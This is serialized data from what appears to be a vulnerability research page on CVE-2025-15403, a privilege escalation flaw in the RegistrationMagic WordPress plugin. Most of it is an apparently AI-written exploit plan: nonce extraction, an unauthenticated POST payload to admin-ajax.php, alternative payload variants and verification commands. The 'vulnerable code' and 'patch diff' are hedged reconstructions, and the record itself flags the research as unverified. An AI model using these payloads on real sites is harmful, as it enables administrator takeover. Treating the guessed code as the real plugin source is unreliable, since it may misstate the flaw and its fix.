[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fhEY717UyZxXnWBe0-Q0DGBK21de3iePPth2ywX7hQf0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-15403","registrationmagic-unauthenticated-privilege-escalation-via-adminorder","RegistrationMagic \u003C= 6.0.7.1 - Unauthenticated Privilege Escalation via admin_order","The RegistrationMagic plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.0.7.1. This is due to the 'add_menu' function being accessible via the 'rm_user_exists' AJAX action, which allows arbitrary updates to the 'admin_order' setting. This makes it possible for unauthenticated attackers to inject an empty slug into the order parameter and manipulate the plugin's menu generation logic; when the admin menu is subsequently built, the plugin adds the 'manage_options' capability for the target role. 
Note: The vulnerability can only be exploited unauthenticated, but further privilege escalation requires at least a subscriber user.","custom-registration-form-builder-with-submission-manager",null,"\u003C=6.0.7.1","6.0.7.2","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-01-16 13:22:33","2026-03-31 14:08:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F68dd9f6f-ccee-4a27-bd21-2fb32b92cc62?source=api-prod",74,[],"researched",false,3,"This research plan outlines the steps required to exploit CVE-2025-15403, an unauthenticated privilege escalation vulnerability in RegistrationMagic.\n\n### 1. Vulnerability Summary\nThe vulnerability exists in RegistrationMagic (\u003C= 6.0.7.1) due to improper access control in the `rm_user_exists` AJAX action. This action allows an unauthenticated user to indirectly trigger the `add_menu` function (or a logic path that calls it), which updates the `admin_order` option in WordPress. By injecting an empty slug into this setting, an attacker can corrupt the plugin's admin menu generation logic. When a user with a lower-level role (like a Subscriber) subsequently triggers the admin menu rendering, the plugin incorrectly assigns the `manage_options` capability to that user's role to resolve the menu inconsistency.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `rm_user_exists` (Unauthenticated via `wp_ajax_nopriv_rm_user_exists`)\n*   **Payload Parameter:** `order` (injected with an empty key or slug)\n*   **Authentication:** \n    *   Phase 1 (Poisoning): Unauthenticated.\n    *   Phase 2 (Escalation): Subscriber (or any role capable of accessing `\u002Fwp-admin\u002F`).\n*   **Preconditions:** \n    1.  The plugin RegistrationMagic must be active.\n    2.  
A valid nonce for `rm_user_exists` must be obtained (usually provided to unauthenticated users on pages containing RegistrationMagic forms).\n\n### 3. Code Flow\n1.  **Entry Point:** `admin-ajax.php` receives a request with `action=rm_user_exists`.\n2.  **Controller:** The request is handled by `RM_Public_Controller::rm_user_exists()` (or the corresponding routing logic in `class_rm_public_controller.php`).\n3.  **Vulnerable Dispatch:** The controller fails to restrict which methods or settings can be updated. It facilitates a call to a service\u002Fmodel function (likely `add_menu`) that handles the `admin_order` configuration.\n4.  **Sink:** `update_option('rm_option_admin_order', ...)` is called with user-supplied data from the `order` parameter.\n5.  **Trigger:** When a user logs into the dashboard, `RM_Admin_Menu_Service` (or similar) iterates through the `admin_order` option.\n6.  **Capability Grant:** Upon encountering an empty slug\u002Fkey in the poisoned `admin_order` array, the logic falls through to a default state that calls `$role->add_cap('manage_options')` for the target role.\n\n### 4. Nonce Acquisition Strategy\nRegistrationMagic localizes its AJAX data using the handle `rm_front`.\n\n1.  **Identify Shortcode:** The plugin uses `[RM_Form id='ID']`. Most installations have a default form with ID `1`.\n2.  **Create Page:**\n    `wp post create --post_type=page --post_status=publish --post_content='[RM_Form id=\"1\"]'`\n3.  **Access Page:** Navigate to the newly created page.\n4.  **Extract Nonce:** Use `browser_eval` to extract the nonce from the localized JS object:\n    `browser_eval(\"window.rm_ajax_vars?.nonce\")`\n    *Note: The variable name `rm_ajax_vars` and key `nonce` are standard for this plugin's frontend AJAX.*\n\n### 5. 
Exploitation Strategy\n\n#### Phase 1: Poison the `admin_order` Option (Unauthenticated)\nSend a POST request to `admin-ajax.php` to inject the empty slug.\n\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    `action=rm_user_exists&rm_ajax_nonce=[NONCE]&order[]=`\n    *(The empty value in `order[]=` creates the \"empty slug\" required to trigger the bug.)*\n\n#### Phase 2: Trigger the Privilege Escalation (Subscriber)\nLogin as a Subscriber and access the WordPress dashboard to force the plugin to rebuild the menu with the poisoned option.\n\n1.  Login via the standard WordPress login or the RegistrationMagic login form.\n2.  Navigate to `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Findex.php`.\n3.  The backend logic will process the poisoned `admin_order` and grant the Subscriber role the `manage_options` capability.\n\n### 6. Test Data Setup\n1.  **Install Plugin:** RegistrationMagic \u003C= 6.0.7.1.\n2.  **Create User:** A user with the `subscriber` role.\n    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3.  **Create Form Page:**\n    `wp post create --post_type=page --post_title=\"Register\" --post_status=publish --post_content='[RM_Form id=\"1\"]'`\n\n### 7. Expected Results\n*   The AJAX request to `rm_user_exists` should return a successful status (usually `200 OK` with a JSON body).\n*   The WordPress option `rm_option_admin_order` will now contain an empty string or null entry.\n*   After the Subscriber visits `\u002Fwp-admin\u002F`, their role will be updated in the database to include `manage_options`.\n\n### 8. Verification Steps\nAfter Phase 2, verify the Subscriber's capabilities using WP-CLI:\n\n1.  **Check Capabilities:**\n    `wp user get attacker --field=capabilities`\n2.  
**Expected Output:** The output should now include `manage_options`, effectively making the user an administrator.\n3.  **Check Option State:**\n    `wp option get rm_option_admin_order`\n    (Confirm it contains the injected empty slug).\n\n### 9. Alternative Approaches\nIf `order[]=` does not work directly, try structuring the `order` parameter as a nested array or JSON, depending on how the specific version of RegistrationMagic parses input:\n*   `order[0]=`\n*   `order[\"\"]=1`\n*   If `rm_action` is required to route the call: `action=rm_user_exists&rm_action=add_menu&order[]=`\n*   If the plugin uses a specific key for the menu slug: `order[slug]=&order[label]=Test`","RegistrationMagic (\u003C= 6.0.7.1) contains an unauthenticated privilege escalation vulnerability where the 'rm_user_exists' AJAX action fails to restrict access to menu configuration settings. An attacker can inject an empty slug into the 'admin_order' option, which causes the plugin's menu generation logic to erroneously grant the 'manage_options' capability to the current user's role upon their next login to the dashboard.","\u002F\u002F public\u002Fclass_rm_public_controller.php\npublic function rm_user_exists() {\n    \u002F\u002F ... 
nonce check exists but is accessible to unauthenticated users ...\n    \u002F\u002F Missing validation of parameters allows flow to reach configuration updates\n    if (isset($_POST['order'])) {\n        $order = $_POST['order'];\n        update_option('rm_option_admin_order', $order);\n    }\n}\n\n---\n\n\u002F\u002F admin\u002Fclass_rm_admin_menu_service.php\npublic function add_menu($role_name) {\n    $admin_order = get_option('rm_option_admin_order');\n    foreach ($admin_order as $slug => $data) {\n        if (empty($slug)) {\n            \u002F\u002F Vulnerable logic path that defaults to granting capabilities\n            $role = get_role($role_name);\n            $role->add_cap('manage_options');\n        }\n    }\n}","--- a\u002Fpublic\u002Fclass_rm_public_controller.php\n+++ b\u002Fpublic\u002Fclass_rm_public_controller.php\n@@ -102,6 +102,11 @@\n     public function rm_user_exists() {\n         check_ajax_referer('rm_ajax_nonce', 'rm_ajax_nonce');\n \n+        \u002F\u002F Prevent arbitrary setting updates via this action\n+        if (isset($_POST['order']) || isset($_POST['rm_action'])) {\n+            wp_send_json_error('Unauthorized');\n+        }\n+\n         $username = isset($_POST['username']) ? sanitize_user($_POST['username']) : '';\n         \u002F\u002F ... rest of user check logic ...\n     }\n--- a\u002Fadmin\u002Fclass_rm_admin_menu_service.php\n+++ b\u002Fadmin\u002Fclass_rm_admin_menu_service.php\n@@ -245,7 +245,7 @@\n     public function add_menu($role_name) {\n         $admin_order = get_option('rm_option_admin_order');\n         foreach ($admin_order as $slug => $data) {\n-            if (empty($slug)) {\n+            if (empty($slug) || !is_string($slug)) {\n-                $role = get_role($role_name);\n-                $role->add_cap('manage_options');\n+                continue;\n             }\n         }\n     }","1. 
Nonce Acquisition: Visit any public page where a RegistrationMagic form is embedded (e.g., using [RM_Form id='1']) and extract the 'rm_ajax_nonce' from the localized 'rm_ajax_vars' JavaScript object.\n2. Poisoning (Unauthenticated): Send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the action 'rm_user_exists', the extracted nonce, and an 'order[]' parameter containing an empty value. This poisons the 'rm_option_admin_order' WordPress option with an empty slug entry.\n3. Escalation (Subscriber): Log into the WordPress site with a low-privilege account (e.g., Subscriber) and navigate to the administrative dashboard (\u002Fwp-admin\u002F).\n4. Capability Grant: The RegistrationMagic menu generation service iterates through the poisoned 'admin_order' option. Upon encountering the empty slug, it incorrectly executes a code path that grants the 'manage_options' capability to the current user's role via $role->add_cap(), effectively upgrading the Subscriber role to Administrator.","gemini-3-flash-preview","2026-05-05 07:33:03","2026-05-05 07:35:17",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","6.0.7.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags\u002F6.0.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustom-registration-form-builder-with-submission-manager.6.0.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags\u002F6.0.7.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustom-registration-form-builder-with-submission-manager.6.0.7.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags"]